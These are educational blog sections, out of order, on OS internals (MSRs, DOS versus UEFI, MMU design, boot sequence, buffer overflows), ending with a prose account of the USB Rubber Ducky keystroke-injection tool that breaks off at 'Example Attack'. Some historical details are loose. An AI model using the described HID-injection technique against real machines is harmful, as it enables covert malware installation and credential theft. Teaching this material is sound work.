  • The Translation Lookaside Buffer (TLB) is a small, very fast cache inside the CPU that stores recent virtual → physical address translations.

  • Without the TLB, every memory access would require walking the entire page table - which is slow.

  • When we add extra entries to page tables (like MSR memory regions):

    • The CPU has more translations to remember.

    • The TLB fills up faster.

    • Entries get evicted more often.

    • The CPU has to reload mappings repeatedly.

  • This increased load is called TLB pressure.

3. Accidental Access Becomes Common

Any buggy pointer operation like:

    mov eax, [rax + wrongOffset]

might accidentally touch an MSR address and break CPU configuration which is Catastrophic.

4. No Security Boundary

User programs could simply try:

    mov eax, [MSR_ADDRESS]

forcing the CPU to trap on every attempt.

• This creates performance overhead and security noise.

5. Hardware Becomes More Complicated

• CPU designers would need:

  • dedicated address comparators

  • privilege checkers

  • memory decoders

• All of the above just to protect MSR regions in memory.

• This makes CPUs slower, larger, and more complex unnecessarily.

Conclusion

• Mapping MSRs into normal memory would waste address space, inflate per-process page tables, weaken isolation, complicate CPU hardware, and create an overall unmaintainable design.

• Therefore, MSR access must use dedicated special opcodes (RDMSR, WRMSR) that only run in privileged mode.

Why Bare Metal Does Not Work for DOS Anymore

DOS was written for a very specific era of hardware

• DOS was designed in the late 1980s and early 1990s for:

  • 8086 / 80286 CPUs

  • Single-core processors

  • Real Mode (no protection)

  • No privilege levels

  • No multitasking

  • Specific I/O ports

  • BIOS routines (INT 0x10, INT 0x13, etc.)

  • Simple memory layout

  • Hardware probing via BIOS

• So DOS makes assumptions such as:

  • “Video card is available at this I/O port.”

  • “Disk can be accessed using BIOS INT 0x13.”

  • “Memory layout is under 1 MB.”

  • “Interrupts are handled by BIOS.”

  • “CPU boots in 8086 Real Mode.”

• These assumptions were true at that time.

Modern bare-metal hardware no longer satisfies DOS assumptions

• Today’s bare-metal systems:

  • boot using UEFI → not BIOS

  • start in 64-bit mode (long mode)

  • do not expose old I/O ports

  • do not emulate BIOS interrupts

  • do not provide Real Mode drivers

  • use modern bus structures (PCIe, ACPI)

  • use protected/privileged mode architecture

• So if you boot DOS directly on modern hardware:

  • DOS looks for hardware that no longer exists.

  • Calls BIOS interrupts that UEFI does not provide.

  • Assumes CPU is in real mode (it isn’t).

  • Assumes disks respond to old INT 0x13 routines (they don’t).

• Result: DOS cannot run on bare-metal UEFI hardware because its fundamental hardware assumptions are broken.

Why DOS can still work (Legacy Mode / VM)

On legacy BIOS systems

• Old BIOS motherboards still emulate the environment DOS expects:

  • Real Mode

  • BIOS interrupts

  • Classic I/O ports

  • Old memory model

• So DOS boots perfectly.

On modern CPUs through Legacy Compatibility Mode

• Even new Intel/AMD CPUs still support 8086 Real Mode for compatibility.

• The problem is:

  • UEFI does NOT provide the BIOS interrupt layer DOS requires.

• But if the motherboard includes:

  • “CSM mode” (Compatibility Support Module),

  • “Legacy Boot” option

• Then the system temporarily provides BIOS-like services → DOS works.

On VMs

• VMware, VirtualBox, QEMU, DOSBox all emulate:

  • BIOS

  • INT 0x13 / 0x10

  • Real Mode

  • ISA/PCI devices

• So DOS runs flawlessly.

Why UEFI Replaced BIOS

Limitations of BIOS

• BIOS had to:

  • probe every device manually

  • use 16-bit Real Mode

  • operate under 1 MB memory

  • depend on slow polling loops

  • lacked security

  • had no standard for drivers

Limitations Fixed by UEFI

• UEFI introduces:

  • 32-bit or 64-bit execution

  • No probing - hardware reports itself to the UEFI (device discovery)

  • Secure Boot (signed bootloaders)

  • Chain of Trust

  • NVRAM boot entries

  • Drivers written in UEFI itself

  • Fast booting

  • Direct loading of OS kernel (no need for a bootloader in many cases)

• UEFI came around 2009–2010 for mainstream PCs.

Why UEFI Doesn’t Support DOS

• UEFI never intended to support 1980s software.

  • 8086 software is no longer common

  • Old BIOS interrupts are not present

  • DOS depends entirely on BIOS services that UEFI doesn’t implement

  • UEFI expects the OS to handle its own drivers

⚠️ In the depths of memory lies madness — where pages blur, addresses warp, and only the brave dare to map reality.

The following content dives deep into the shadows of system memory — where addresses deceive, and pages guard their secrets.

Students and beginners, proceed at your own risk — the MMU remembers everything you do.

In this OS series, the focus will be on the Operating System (software context) components, not the hardware context of the components. (For the hardware context, refer to computer architecture.)

Special Thanks

Heartfelt gratitude to Mr. Adhakshoj Mishra Ji for his insightful session and for reviewing this blog.

A sincere thanks as well to the BreachForce Community Members for sharing their valuable notes, and to the BreachForce Community Volunteers for helping collate and refine this content.

Preface

In the last blog, we explored how the Context Switching Mechanism allows the CPU to alternate between processes, creating the illusion of multitasking on a single processor.

In the below blog, we will discuss the problems along with their possible solutions. With those solutions, there will occur some min-problems which will be solved using some sort of mini-solutions. According to those solutions, we will modify the design

MMU

Design Architecture 1: CPU + RAM

Design

We have two processes running using the same RAM as per the context-switching process. The assumption here is that these processes will not be continuous. We will insert some chunks of RAM that are not equally sized partitions. If multiple processes are loaded, the RAM will look like this:

• In the above design, the assumption is that the RAM will run one program at a time.

• For some context: assume that the execution of Process 2 is in progress. Process 2 will consume the entire RAM while it is being executed.

• This will lead to some problems

Problem

• Is there any option to limit RAM usage per process, so that one process uses only a certain percentage of RAM?

• If two processes are executed simultaneously and one process encounters an issue, the other process also gets impacted.

• We will assume that there is a flag inside the RAM to check whether a particular part of the RAM is occupied by a process or not.

• What’s the probability that another process wouldn’t access that particular part? Who ensures that such things don’t happen?

• We cannot leave everything to an honor system between programs, can we?

• If a process goes rogue, the OS and all other processes can go kaboom — corrupted code, overwritten data, and unstable execution everywhere.

  (Classic overflow and overwrite chaos — oof.)

• How can we prevent such things from happening?

Solution

• There’s no software-based solution for this — because, well, software alone can’t handle it (or maybe because software designers got lazy 😏).

• So, back to hardware we go.

• The solution is that we will insert an abstraction layer between CPU and RAM.

• From CPU’s POV, it will look like RAM, it will feel like RAM, it will be behave like RAM; but technically it will not be RAM

• The abstraction layer will

  • Pretend to be RAM in front of CPU.

  • Pretend to be CPU in front of RAM.

• The CPU does not need to know what is actually connected to the abstracted RAM

• We will insert a circuit (abstraction layer) which will pretend to be RAM inside the CPU (physically).

• The CPU and RAM will be connected using a data bus and an address bus, which will be understood by both the CPU and the RAM.

• This marks the birth of the MMU (Memory Management Unit) inside the CPU (as of 2025).

Address Bus

• The address bus carries the memory address of the data that the CPU wants to read from or write to in RAM (or other memory-mapped devices).

• It is unidirectional i.e. addresses flow from the CPU to the memory.

• The width of the address bus (e.g., 32-bit or 64-bit) determines how many unique memory locations the CPU can address.

  • Example: a 32-bit address bus → 2³² = 4 GB addressable memory space.

• The address bus is used by the CPU to specify where in memory (RAM) data should be accessed.

Data Bus

• The data bus carries the actual data being transferred between the CPU, RAM, and other components.

• It is bidirectional i.e. data can flow to or from the CPU, depending on whether it’s a read or write operation.

• The width of the data bus (e.g., 8, 16, 32, 64 bits) determines how many bits of data can be transferred in one operation.

• The data bus is used to transfer what data is being read or written.

• This marks the birth of the MMU (Memory Management Unit) inside the CPU (as of 2025).

Design Architecture 2: CPU + Abstraction Layer + RAM

Design

Based on the above proposed solution, our design will look like this:

• For the sake of easy explanation, the abstraction layer (MMU) will be considered as a block between CPU and RAM in the proposed design.

• In reality, however, it exists as a circuit within the CPU hardware.

• The CPU and RAM will be connected using a data bus and an address bus, which will be understood by both the CPU and the RAM.

• The Abstraction Layer will act as a channel through which we can monitor the addresses and data sent by CPU to RAM.

• At present, there would not be any modification done by the Abstraction Layer in address or data passed through it.

• There might be some lag issue in the CPU → RAM communication channels due to the current design; but we will discuss it in the later stages.

• But, the earlier problem still persists.

Problem

• How will we enforce controls on RAM using Abstraction Layer?

Solution

• We will use a specific memory address range which will be used by the processes.

• The Abstraction Layer will ensure that processes will use a specific range of memory addresses only; something like a lookup table

• Each process is told it owns a continuous block of memory (like 0x1000 to 0xFFFF).

• But in reality, those addresses don’t directly map to physical RAM.

• The Abstraction Layer (MMU) keeps a lookup table that translates each process’s “virtual” address to the “physical” address in RAM.

• This isolation ensures:

  • Process A cannot access Process B’s memory.

  • If a process crashes, it can’t corrupt the OS or others.

  • The OS can move memory around physically without processes noticing.

Virtual Address

• A virtual address is the address seen and used by a program (process).

• When your code says:

    int *x = malloc(4);
  

• and it returns something like 0x1000, that’s a virtual address.

• It’s virtual because that address does not correspond directly to a physical location in RAM.

• Instead, the Abstraction Layer (MMU) will later translate that address to a physical address before accessing RAM.

• Think of it like:

  Virtual address = “apartment number” inside a building

  Physical address = “street address” of that building

• Each tenant (process) has its own set of apartment numbers, even if two tenants both have “Apartment 101” — they’re in different buildings (separate address spaces).

Physical Address

• A physical address is the actual address of data in RAM — the one used on the hardware memory chips.

  • It’s where the data is truly stored in memory cells.

  • Only the Abstraction Layer (MMU) and OS kernel deal with these directly.

• So, for example:

  CPU asks for 0x1000 (virtual address).

  MMU translates it (using lookup table) to 0x2000 (physical address).

  Data is fetched from RAM location 0x2000.

Lookup Table

• A lookup table will look like this

  | Virtual Address (what CPU/process uses) | Physical Address (actual RAM) | Meaning | | --- | --- | --- | | 0x1000 | 0x2000 | Data at 0x1000 in program → actually stored at 0x2000 in RAM | | 0x1500 | 0x3000 | Data at 0x1500 → actually stored at 0x3000 | | any other address | address + 0x2000 | For any address not listed, just shift by 0x2000 |

• This is a lookup table (LUT) or mapping table that defines how addresses are translated.

• So, the MMU (Abstraction Layer) uses this table to perform translations on the fly whenever the CPU accesses memory.

• Using lookup table we can divert the processes to different sections in the RAM.

Working of Abstraction Layer

• Process runs and tries to access virtual address 0x1000

• CPU sends 0x1000 to Abstraction Layer (MMU) via address bus

• Abstraction Layer (MMU) looks up 0x1000 in its table:

  • Finds it → maps to 0x2000

• Abstraction Layer (MMU) sends 0x2000 (physical) to RAM

• RAM returns the actual data

• Now the Abstraction Layer (MMU) has the following capabilities:

  • Pretend to be RAM in front of CPU.

  • Pretend to be CPU in front of RAM.

  • Has capability to map virtual memory addresses to physical memory addresses based on internal lookup table

• The current design may look proper on the surface but it has another flaw which we will discuss further

Design Architecture 3: Integration of I/O Port/Bus and RAM within Abstraction Layer (MMU)

Problem

• How will the lookup table be configured by the CPU?

• Is there any way to store lookup tables inside the Abstraction Layer? Because we do not know how big the lookup table will be, how many addresses it will contain, how large the connected RAM will be, or how many offsets there will be.

• Is there any way to store any temporary data output of the CPU calculation logic?

• How will we ensure that older software runs on the current hardware architecture? How will we maintain backward compatibility for older software?

Solution

• Addition of an I/O port/bus from the CPU to the Abstraction Layer (MMU).

• Insertion of dedicated RAM inside the Abstraction Layer (MMU).

• Let’s modify the design based on the proposed solution

Design

• In the current design, the I/O Port will configure the lookup table before execution. We did this because we don’t want to magically configure the RAM directly.

• Personal RAM of Abstraction Layer (MMU) will store current states before sending them to the physical RAM. It will also store multiple lookup-tables for multiple processes.

Working of Abstraction Layer

• If someone executes old software on the current hardware configuration, it will run smoothly since the lookup table will be blank initially. The hardware is designed in such a way that requests will pass through without affecting existing software or requiring any modifications to it.

• We can also configure the lookup table using the I/O port when executing any new software.

• If there is any problem while running the new software, the fault lies within the Meta-Program for messing up the Lookup Table configuration.

• If we are calculating instead of performing one-by-one address mapping, the calculation logic used for translation will still need memory to store the temporary data output of the computation. The Personal RAM of Abstraction Layer (MMU) can be used for this.

• The problem of running old software on current hardware configurations is solved.

• The problem of accidental overwrites is also solved.

• Now the Abstraction Layer (MMU) has the following capabilities:

  • Pretends to be RAM in front of the CPU.

  • Pretends to be the CPU in front of RAM.

  • Has the capability to map virtual memory addresses to physical memory addresses based on an internal lookup table.

  • If the table is not configured, the Abstraction Layer simply passes through all memory I/O requests and responses.

  • Maintains backward compatibility — old software can still run on it just fine.

  • Can be configured for address mapping.

  • Can hold multiple lookup tables.

  • Can switch between multiple lookup tables — the exact table can be specified over the I/O port. Only one lookup table will be active at a given point in time.

  • Lookup table switching will occur during context switching.

Limitations of Current Architecture

• Only one lookup table will be active at a given point of time.

Design Architecture 3: Integration of Interrupt Pin into Abstraction Layer

Problem

• What happens when an address gets modified into an invalid address?

• Example:

  • Mapping: address → address + 5000; with total memory attached = 8000 bytes

  • CPU attempts to read from address 4000

  • Total address value = 9000 bytes > 8000 bytes (current RAM)

• What happens then?

Solution

• Use interrupt to switch control from the CPU to a meta program if there is an invalid read or write operation.

• Connect Interrupt pin of the CPU to the Abstraction Layer.

Design

Based on the proposed solution, we will modify the design

• The Interrupt PIN has been passed from CPU to the Abstraction Layer

Working of Abstraction Layer

• When invalid memory access occurs, an interrupt is triggered on the CPU.

• We can use this interrupt to switch control from the CPU to a meta program if there is an invalid read or write operation on a memory address that is out of bounds.

• For that, the interrupt pin of the CPU will be connected to the Abstraction Layer.

• However, this introduces another problem.

Problem

• What happens after delegating control to the meta program? What will the meta program do?

Solution

• After switching control to the meta program, it will terminate the corrupted process.

• It will stop the program’s execution.

• The developer will then investigate the issue - it’s no longer our concern. Give them the BSOD. Let them suffer 🔥

• We have another potential feature of the current design architecture:

  • We can restrict access to specific memory ranges.

  • For example, the meta-program address range can be kept out of bounds by defining a permissible access range.

  • This ensures that not only the addresses of individual processes are isolated, but the meta-program address space is isolated as well.

• There is another problem now.

Problem

• A process might overwrite the abstraction layer tables if care is not taken. How do we solve this?

• We will learn to solve this in the next lecture of this series

Additional Topics

Unified Memory

• This is Hardware-Level Memory Architecture, not just logical abstraction.

• It’s used in modern CPUs and GPUs (like Apple M-series, AMD APU, Intel integrated graphics, and NVIDIA’s Unified Memory with CUDA).

• Normally, CPU and GPU have separate RAM:

  • CPU → System RAM

  • GPU → VRAM

• Unified Memory combines them into one shared pool.

• Both CPU and GPU can access the same physical memory directly.

• Example:

  GPU reads that same data without copying to VRAM.

  The CPU computes something, writes to memory.

Virtual Addressing

• On a 32-bit system, each process usually gets a 2 GB virtual address space (user space).

• On a 64-bit system, each process can have a much larger virtual address space (4 GB or more depending on OS).

• This is the limit OS generally sets though it will use memory address space depending on its usage.

Buffer Over Flow

• (BoF) is a user-space problem, not a kernel or hardware one.

• We will further understand why BoF is a user-space problem and a not kernel space one.

User Space vs Kernel Space

• The OS divides memory into two big zones:

  | Zone | Who lives here | What it does | | --- | --- | --- | | Kernel Space | OS core, device drivers | Controls hardware, MMU, process scheduling | | User Space | Your programs (processes) | Runs application code, isolated from kernel |

• When your program runs, the MMU + OS give it its own virtual address space

• E.g. 0x00000000 → 0x3FFFFFFF (let’s say 1 GB).

• Inside that range, the process can do whatever it wants — it’s isolated.

Lookup Table (MMU / Page Table)

• That lookup table (MMU page tables) defines which virtual address in that 1 GB range maps to which physical address.

• Once this mapping exists, the kernel steps back — the CPU + MMU handle translations automatically.

• So within that 1 GB virtual sandbox,

  the OS doesn’t care how your program lays out stack, heap, globals, or code — it’s up to you and your compiler/runtime.

Process Layout

• Inside that 1 GB virtual space, the process layout usually looks like:

    +---------------------+  ← High addresses
    | Stack               |  (grows downward)
    +---------------------+
    | Memory-mapped libs  |
    +---------------------+
    | Heap                |  (grows upward)
    +---------------------+
    | Data (globals)      |
    +---------------------+
    | Code (text)         |
    +---------------------+  ← Low addresses
  

• These regions are managed by the runtime and allocator (malloc, etc.).

• But how they are used depends entirely on the program code.

Where Buffer Overflow Happens

• Now, a Buffer Overflow (BoF) happens inside this user-space layout, for example:

    char buf[10];
    strcpy(buf, "AAAAAAAAAAAAAAAAAAAA");  // 20 bytes into a 10-byte array
  

• Here:

  • The CPU executes normal user-space instructions.

  • The OS and MMU have no idea you’re writing past 10 bytes.

  • You’re still writing to a valid address in your 1 GB range, just into the wrong variable.

• So the hardware doesn’t see it as a violation — it’s still your memory!

• Only when you cross into an unmapped page (like going beyond your 1 GB range) does the MMU raise a segmentation fault.

• So:

  The BoF isn’t caused by kernel or hardware malfunction — it’s caused by bad logic in the program’s layout or memory management inside its own address space.

• That’s why buffer overflows are a software bug, not a hardware fault.

• Stack overflow: function calls or local arrays exceed stack boundary.

• Heap overflow: dynamic allocations overwrite adjacent blocks.

• Both are results of the process corrupting its own layout - still within its own sandbox and not anything the OS or MMU did wrong.

Additional Points

• We are in the 1980s now.

• There is no operating system or kernel - the CPU is booted using BASIC.

• Currently, we will focus only on design problems. In 2025, we will address optimization problems.

• The concept of privilege levels does not exist yet - there are no roles; the CPU has only one mode of operation (system role).

• This is the start of the concept of Memory Management Unit (MMU) and its functionalities.

⚠️ Ye who have ventured here, hath abandoned all hope...

The following content contains intense cybersecurity themes and may not be suitable for the faint-hearted

Students and beginners, proceed at your own thrill — this is not a walk in the park

Design Architecture 1: CPU + RAM

The Goal: Establish a basic hardware execution environment where the processor can read and execute instructions.

First we will make a dummy diagram of the current architecture which contains CPU and RAM

In the above diagram, the following components will perform the following functions.

Note: The current scenario illustrates the 1970s computer architecture without any modern computer hardware/software design functionalities like Parallel Processing, Multi Processing, Threading, Interrupts, etc. We will learn each and every design paradigm as we move on

CPU

• Can execute instructions from a fixed memory address (called the reset vector)

RAM

• Can store instructions and data, but is volatile (empties at power cycle)

Power Cycle

• A power cycle means turning a device off completely and then turning it back on.

• It's used to reset the hardware and bring the system back to a known initial state.

• This violently purges all temporary memory (RAM), CPU registers, caches, and hardware latches

• It's like giving the entire system a fresh start — especially useful when the system is frozen, behaving unexpectedly, or needs to reinitialize hardware.

Anatomy of a Power Cycle

Here is the exact CPU sequence during a power cycle:

1. Power is removed

• When the system turns off, the CPU loses power.

• All its internal states (registers, cache, control logic) are erased.

• The CPU becomes completely inactive.

2. Power is restored

• Once power is turned on again:

• The Power Supply Unit (PSU) stabilizes and sends a Power Good electrical signal to the motherboard.

• This tells the CPU: "Voltage levels are stable - you can start now."

3. CPU reset sequence begins

• The CPU automatically starts executing code from a fixed memory address called the reset vector (e.g., 0xFFFF0 in early 16-bit CPUs like the 8086).

4. CPU state after power cycle

When the CPU restarts:

• All registers are set to default values.

• Instruction pointer (IP) is locked to the reset vector.

• Caches and buffers are empty.

• The CPU operates as if it's being used for the first time (a completely blank state).

Current Design

• When CPU powers on

  • Upon power-on, the CPU immediately attempts to fetch its first instruction from the hardcoded reset vector (e.g., 0xFFFF0)

Problem - Volatility Trap

• Because RAM is volatile, when it is powered on, its contents are random ("indeterminate") until explicitly initialized. It's not guaranteed to be zero.

• Therefore, the memory at the reset vector, where the CPU expects its very first instruction, contains random garbage.

• If the first instruction is garbage or invalid, the CPU usually triggers a fault, like an illegal instruction exception and crashes immediately.

• The CPU cannot safely execute empty or random RAM. We need a valid instruction already in RAM at the reset vector.

• How do we ensure that the RAM contains a valid instruction at the reset vector?

Solution - Manual Bootstrapping

• The Approach: The operator must manually inject valid code into RAM before letting the CPU execute.

• The Steps:

  1. The operator flips physical toggle switches on a front panel, or uses a paper tape, punched card reader, or console input to feed binary instructions directly into the RAM.

  2. Once this small "bootstrap" code is in RAM, the CPU is released to start executing from the reset vector.

  3. This bootstrap program's job is to read a larger program from a tape or disk into the rest of the RAM.

Limitations

• Because RAM gets wiped out on every power cycle, an operator has to manually punch this code in every single time the computer restarts.

• Is it possible to automate the bootstrap process so that manual code entry is no longer required on every boot?

Design Architecture 2: CPU + RAM + ROM

The Goal: Automate the bootstrap process so manual code entry is no longer required on every boot.

To solve the volatility trap of early computers, a new hardware component - ROM (Read-Only Memory) was introduced into the earlier design of the CPU and RAM.

CPU

• Executes instructions from a fixed memory address (the reset vector).

• Can be later configured to execute arbitrary code from any memory location.

RAM

• Can store instructions/data, but is volatile (empties at power cycle)

• Used by the CPU to execute code once it has been loaded from ROM.

ROM

• Stores fixed code that cannot be easily modified.

• Usually contains the initial bootloader or firmware.

• The code stored in ROM contains the instructions that tell the CPU to move data into the RAM.

Current Design

• Instead of punching code into RAM, we embed the bootstrap code permanently into ROM. We map the CPU's reset vector to point to the ROM chip.

• Execution: When the CPU powers on, it starts executing instructions from the reset vector. It runs the bootloader straight from ROM, which then loads the instructions into RAM.

• The Handover: Once the ROM contains the bootstrap code and loads the instructions into RAM, the CPU is ready to execute from the workspace.

• Advantage: No need to directly punch the code into the RAM every time the system restarts.

Problem

• Fixed Code: ROM stores fixed code, so it cannot be modified.

• No Flexibility: A computing setup that requires customization or flexibility cannot change the bootstrap code burned into the ROM.

• Result: No scope for customizing the bootstrap process.

• How do we customize the bootstrap process?

Design Architecture 3: CPU + RAM + ROM + Long Storage Device

The Goal: To gain the flexibility to change or update the bootstrap code without replacing the physical ROM hardware, and to enable the loading of larger, more complex programs.

In this design, we solve the "Fixed Code" problem of Architecture 2 by adding a Long Storage Device (e.g., Hard Drive, SSD, or Magnetic Tape).

CPU

• Executes instructions from a fixed memory address (the reset vector).

• Follows the instructions in ROM to fetch the program from the Storage Device and load it into the RAM.

• Can be later configured to execute arbitrary code from any memory location.

RAM

• Can store instructions/data, but is volatile (empties at power cycle)

• Used by the CPU to execute the program loaded from the storage device.

ROM

• Stores fixed code that cannot be easily modified.

• Contains the instructions needed to initialize the Long Storage Device.

• Provides instructions to allow CPU to read from storage device

• Provides instructions to allow CPU to write to storage device

• If the ROM software (bootstrap code) is written to support reading from an external storage device, then it can:

  • Access the storage device

  • Read the program or instructions from it.

  • Load those instructions into a designated execution area in RAM (such as 0x7C00 for BIOS systems).

  • Trigger the CPU to start executing the loaded code from RAM.

Long Storage Device

• Stores the actual bootstrap code or program (like an OS) permanently.

• Unlike ROM, the data here can be updated or changed by the user at any time.

Current Design

• Power On: The CPU wakes up and begins executing from a hardcoded address (the Reset Vector, such as 0xFFFFFFF0 for x86).

• Hardware Mapping: This address points directly to the ROM. No address translation occurs yet because the MMU (Memory Management Unit) is not yet active.

• The Fetch: The chipset routes reads to the BIOS ROM, which contains the minimal instructions needed to "wake up" the rest of the hardware.

• The Handover: The CPU executes the ROM code, which finds the program on the Long Storage Device and copies it into RAM.

• Execution: The CPU stops reading from the ROM and begins running the program (the Operating System) directly from the RAM.

Note: ROM configures the hardware so that the initial bootstrap code is available to the CPU at the reset vector, typically using memory-mapped I/O. We will revisit this section in upcoming lectures to study concepts such as the MMU more thoroughly.

Inference

• Till now we have satisfied the necessary hardware requirements, to run a program like the Operating System which can control many other small programs

• Here onwards, we will focus on the historical and technical context of each of the functionalities required to build the Operating System (our universal program)

• In a modern BIOS system, the ROM isn't just a "loader" - it's an interface. It provides basic services (like "write this text to the screen") that the early bootloader uses before the Operating System is fully awake. For more information refer to the BIOS Boot Sequence at the end of this blog.

Historical Context Note: This architecture allowed computers to move from being single-purpose tools (like a calculator) to general-purpose machines (like a PC) that could run entirely different software simply by swapping the contents of the Storage Device.

File System

Problem

• To run a different program from another storage medium, we currently need to power cycle the computer.

• Is there a way to store multiple programs on the same storage device?

Solution

• For point (2), we can do it, as long as we do the necessary book keeping to keep track of what program is stored at which location (memory address)

Book-Keeping System (File System)

• To store multiple programs, we'll introduce a simple book-keeping system on the storage device, a mini file system: which has three members:

• The initial book-keeping system will look like this
  <program id><start address><end address>

• This book-keeping helps us remember where each program lives on the storage device.

• It's the foundation of our toy file system or a tiny version of FAT32

Meta-Program

Problem

• Earlier we stored multiple programs into the same file system. Now we have another problem.

• Can we switch between programs on the same storage device?

Solution

• We can write a small meta-program that allows switching between different programs and store it alongside the RAM

• With this, our architecture of RAM will be modified to this

  

• This program provides additional capabilities beyond the basic bootstrap logic.

Bootstrap Code

• The bootstrap code (also known as a bootloader) is a small, fixed program stored in ROM that runs immediately after the CPU powers on.

• Its main job is to initialize the system and load the actual program from storage into RAM so the CPU can start executing it.

Features of Meta-Program

• It can perform read/write operations on the storage medium (either directly or through the ROM)

• It understands the bookkeeping data (i.e., it includes bookkeeping logic) present on the storage medium

• As an extension of the book-keeping logic, it can load any program using its unique ID

Loading a Program by ID

1. Using the given program ID, locate its start address and end address on the storage device

2. Read data sequentially from the start address to the end address, copying it into RAM

3. Execute a direct jump instruction (JMP <address in RAM>) to transfer control to the newly loaded program

4. Wait until execution finishes, before accepting the next instruction on program load

System-Call

Problem

• When a user program finishes execution or needs to perform a system-level task (like exiting, reading from storage, or displaying output), it must hand control back to the meta-program

• If the program simply halts the CPU (e.g., using an instruction like HLT), the system stops entirely

• We need a controlled way for programs to return control to the meta-program without halting the processor

Solution

• Introduce a standardized mechanism for programs to jump to specific, predefined addresses in the meta-program — effectively creating an API interface between the program and the meta-program

Handling Control using API

• The meta-program provides a set of known jump destinations (like functions) to handle specific operations such as exiting or I/O

• The compiler for this computer stack recognizes these function calls (e.g., exit()) and emits the corresponding JMP instruction to the predefined address in the meta-program

• When the program executes that jump, control safely returns to the meta-program as the meta-program has already blocked that predefined address

• This mechanism is the early conceptual form of system calls (syscalls) — a structured way for user programs to communicate with and transfer control to the supervisory meta-program (later known as the Operating System kernel).

Interrupts

Problem

• We can execute only one program at a time

• If a program is waiting for a hardware response (like disk I/O or network data), the CPU remains idle in the meantime.

• This wastes potential processing time and reduces overall efficiency.

• Is there a way to make the CPU do something useful while another program is waiting? Essentially, to run multiple programs seemingly at once, even though there is only one CPU.

Solution

• Add a timer, bro ☺︎

Timer Functionality

• A timer is added to the CPU

• The timer's frequency is configurable, allowing us to decide how often it triggers

• When the timer trips, it can be configured to make the CPU automatically jump to a fixed memory address

• We modify the meta-program to include a special piece of code at that address — this code runs every time the timer trips.

• Inside that special code, we implement logic to shuffle or switch between processes.

Interrupt

• When the timer trips, it interrupts the CPU from whatever it was doing — hence it's called an interrupt

• The special code that runs in response is called an interrupt handler, because it handles what happens when the interrupt occurs

Context Switching

Program

• A program is just passive code stored on disk

Process

• A process is an active instance of that program running in memory — it has its own CPU registers, stack, and current execution point

Problem

• How do we shuffle or switch between processes?

States of Process

• Our process will have mainly two states

  • Running: The process is currently being executed by the CPU

  • Suspended: The process has temporarily paused its execution, waiting to be resumed later

• As such, we have to keep track of both of the states in order to get a successful shuffle

Solution

• We save the state of the currently running process and restore the state of a previously suspended process.

Components of Process State

A process's state includes:

• Execution status: Whether it's running or suspended.

• CPU registers: Program Counter (PC), Stack Pointer (SP), general-purpose registers, flags, etc.

Steps to shuffle processes

• Save the state of the current (running) process

  • Copy all relevant CPU registers into memory reserved for that process.

  • Mark the process as suspended.

• Restore the state of the next (suspended) process

  • Copy the saved CPU registers from memory back into the CPU.

  • Mark the process as running.

• Resume execution

  • Jump to the program counter (PC) saved in the restored state.

  • Execution continues exactly where the process left off:

    • JMP<address in process memory>

• This mechanism is called context switching, and it allows the CPU to alternate between processes, giving the appearance of multitasking on a single processor.

Extra Notes

The BIOS Boot Sequence (The Legacy Path)

1. The Wake-Up (ROM + CPU)

The moment you hit the power button, the CPU is "dumb." It goes to that hardcoded Reset Vector (0xFFFFFFF0) which is wired to the ROM.

• The BIOS (Basic Input/Output System) code starts running.

• It performs the POST (Power-On Self-Test) to make sure your RAM isn't fried and your keyboard is plugged in.

2. The Search (ROM → Long Storage)

The BIOS has a "Boot Order" stored in its settings. It looks at your Long Storage Device (Hard Drive or SSD) and searches for the very first sector of data, known as Sector 0.

• This specific 512-byte chunk is called the MBR (Master Boot Record).

3. The Micro-Load (CPU moves Storage → RAM)

This is the "nitty-gritty" part. The BIOS code tells the CPU: "Grab those 512 bytes from the MBR and copy them into RAM at a very specific address: 0x7C00."

• Why 0x7C00? It’s just a historical convention from the early 1980s, but every BIOS follows it.

4. The Handover (The Jump)

Once those 512 bytes are sitting in RAM, the BIOS gives its final command to the CPU: "JMP 0x7C00." The CPU stops executing the fixed code in the ROM and starts executing the code it just moved into the RAM.

5. The Multi-Stage Loading (The OS takes over)

Since 512 bytes is too small for a whole OS (Windows or Linux), that tiny bit of code in RAM is a "Stage 1 Bootloader." Its only job is to:

1. Know how to read the rest of the Long Storage Device.

2. Pull the actual Operating System files into the RAM.

3. Fully initialize the OS.

Disguised as removable storage, the device uses USB Human Interface Device (HID) emulation so preloaded scripts can drive the target machine automatically. When plugged into a computer, it is recognized as a keyboard (Human Interface Device) and can rapidly inject malicious keystrokes or commands at superhuman speeds, automating attacks such as backdoor creation, data theft, or other exploits.

This introduced Keystroke Injection in 2010 with the USB Rubber Ducky. This technique, developed by founder Darren Kitchen, was his weapon of choice for automating mundane tasks at his IT job — fixing printers, network shares and the like. Today, the USB Rubber Ducky is a hacker culture icon, synonymous with the keystroke injection technique it pioneered.

Key Features

• The USB Rubber Ducky was developed by Hak5, a well-known cybersecurity and penetration testing company founded by Darren Kitchen and is an iconic tool in hacker culture, embraced by cybersecurity professionals for its effectiveness.

• It uses its own scripting language called DuckyScript to craft payloads ranging from simple automated tasks to highly advanced attacks.

• Because computers inherently trust keyboards, the device can bypass many security controls that would otherwise prevent untrusted devices from executing code.

How it works

• When connected, the device identifies itself to the system as a keyboard (HID), not as a storage device, bypassing many traditional security bans on removable media.

• Attackers load a script, written in the DuckyScript programming language, onto the Rubber Ducky via a microSD card.

• Upon insertion, the device automates keystrokes, rapidly executing commands such as opening PowerShell/Terminal, downloading malware, creating new users, changing settings, or stealing credentials.

• The process is silent, fast (superhuman typing speed) and often goes unnoticed, as these commands look like ordinary keyboard input to the operating system and security software.

Workflow

i] Payload Preparation

• The attacker writes a script in DuckyScript to automate desired actions (e.g., opening command prompt, typing commands).

• The DuckyScript is compiled into a .bin payload, then loaded onto the device’s microSD card.

ii] Device Plugged In

• Upon insertion, the microcontroller initializes, sometimes after a short delay for stable recognition.

iii] Emulation and Execution

• The microcontroller reads the binary payload from the microSD card and "types" the commands via the USB interface by emulating keyboard strokes.

• Why binary payload?

  • Duckyscript is compiled to a .bin of USB HID report sequences (scancodes + timing)

  • Precompiled binaries remove interpreter overhead, giving deterministic, low-latency keystroke injection

  • Binaries provide precise timing and layout-specific scancodes, improving reliability across OS’s and locales

• These keystrokes occur at superhuman speed, automating complex tasks almost instantly and usually avoiding software-based detection because they appear as normal keyboard input.

iv] Command Completion

• As the attack or automation routine is completed, after which the Rubber Ducky remains idle or waits for further input.

Example Attack

